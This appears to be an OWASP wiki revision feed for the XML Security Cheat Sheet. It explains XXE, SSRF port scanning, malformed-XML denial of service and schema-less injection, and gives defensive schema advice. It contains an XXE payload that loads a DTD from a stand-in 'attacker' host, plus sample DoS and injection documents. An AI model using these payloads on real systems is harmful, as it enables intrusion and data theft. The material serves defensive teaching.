&lt;br /&gt;
==== External File Retrieval ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, do not use DTD.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224414</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224414"/>
				<updated>2016-12-21T18:42:48Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
Code Sample 23: An XML Schema providing a set of restrictions over the document on Code 18&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
